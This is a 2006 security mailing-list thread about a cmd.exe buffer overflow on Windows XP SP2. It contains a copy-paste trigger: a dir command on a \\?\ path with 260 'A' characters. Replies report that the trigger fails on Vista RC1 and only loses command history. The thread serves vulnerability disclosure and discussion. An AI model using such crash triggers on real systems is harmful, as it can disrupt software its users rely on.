WXPSP2 fully patched:

C:\>ver

Microsoft Windows XP [Version 5.1.2600]

C:\>%COMSPEC% /K "dir \?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The filename or extension is too long.

C:\>

... but then, all the command history is lost; you cannot arrow-up to repeat the command.

-----Original Message-----
From: listbounce (at) securityfocus (dot) com [email concealed] on behalf of Osvaldo Casagrande
Sent: Fri 2006-10-20 04:51
To: gregory_panakkal; vuln-dev (at) securityfocus (dot) com [email concealed]
Subject: RE: Windows Command Processor CMD.EXE Buffer Overflow

It does not works on Windows Vista RC1 (5728)

Osvaldo Casagrande
MCSE. MCT, MVP, Security+
Gerente de Servicios
DiviServ S.A.
D: 595(21) 613 828 | Cel. 595 (971) 300 836 | |: ocasagrande (at) diviserv (dot) com [email concealed] | Add me to messenger

Busca mis referencias? / Looking for my personal references?
Acces to Programa MVP - Access to Certificaciones MS On "Transcript ID" input: 740381 / On "Access Code" input: ViewMyInfo

Running Windows Vista RC1- Build 5728 and Office 2007 Beta 2 TR

CONFIDENCIALIDAD: La informacion contenida en este mail y sus anexos es confidencial y/o privilegiada y esta reservada para el destinatario unicamente. Si usted no es el destinatario o un agente responsable de enviar este mensaje al destinatario final, se le notifica que: No puede utilizarlo, retransmitirlo, imprimirlo, copiarlo o divulgar las informaciones contenidas en este mail o sus anexos o tomar cualquier accion basada en estas informaciones. Si usted recibe este mensaje por error, por favor avise inmediatamente al remitente, y tenga la amabilidad de borrarlo de su computadora o cualquier otro banco de datos. DIVISERV agradece su cooperacion.

This mail message may contain confidential and/or privileged information for the adressee. If you are not the addressee or authorized to receive this for the addressee, you must not use, copy, print, retransmit, disclose or take any action based on this message or any information herein. If you have received this message by mistake, please advise the sender immediately replying this message and delete it from your computer and any database. DIVISERV appreciates your cooperation.

-----Original Message-----
From: listbounce (at) securityfocus (dot) com [email concealed] [mailto:listbounce (at) securityfocus (dot) com [email concealed]] On Behalf Of gregory_panakkal
Sent: Wednesday, October 18, 2006 11:33 PM
To: vuln-dev (at) securityfocus (dot) com [email concealed]
Subject: Windows Command Processor CMD.EXE Buffer Overflow

Windows Command Processor CMD.EXE Buffer Overflow
Tested on WinXP SP2
Impact - Very Low

Copy-paste the following line in cmd.exe and execute it..
(it is a single command, has been split into multiple lines for
readability sake).

%COMSPEC% /K "dir
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

DEP Comes into the picture.

URL :
http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-
buffer-overflow.html

regards,
Gregory Panakkal
www.infogreg.com
--
gregory_panakkal
gregory_panakkal (at) fastmail (dot) fm [email concealed]

--
http://www.fastmail.fm - I mean, what is it about a decent email service?

[ reply ]